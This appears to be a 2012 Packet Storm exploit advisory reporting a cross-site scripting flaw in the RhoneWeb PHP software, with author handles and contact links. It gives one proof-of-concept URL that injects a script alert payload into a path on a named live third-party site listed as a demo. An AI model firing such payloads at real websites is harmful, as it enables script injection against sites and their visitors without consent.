RhoneWeb Cross Site Scripting

2012-01-11T00:00:00
ID PACKETSTORM:108562
Type packetstorm
Reporter 3spi0n
Modified 2012-01-11T00:00:00

Description

                                        
                                            `# Exploit Title: RhoneWeb Xss Vulnerability  
# Date: 11/01/2012  
# Author: 3spi0n  
# Software Website: http://www.rhone.ch/  
# Tested On: BackTrack 5 - Win7 Ultimate  
# Platform: Php  
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>  
[$] Demo Sites:  
  
[~]  
http://www.upsa-vs.ch/pdf/Extension%20Avenant%202011.pdf%3C/cite%3E%3Cspanclass=%3E%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E[XSS]  
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>  
  
# Dar bi Koridor Benimki, Kendimi Aradigim.  
  
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>  
  
# Contact: Twitter.Com/RigidusCO - Facebook.Com/3spi0ne  
  
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>  
  
- Mr.PaPaRoSSe And 3spi0n -  
  
Bug Researcher Group - TURKEY  
  
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>  
`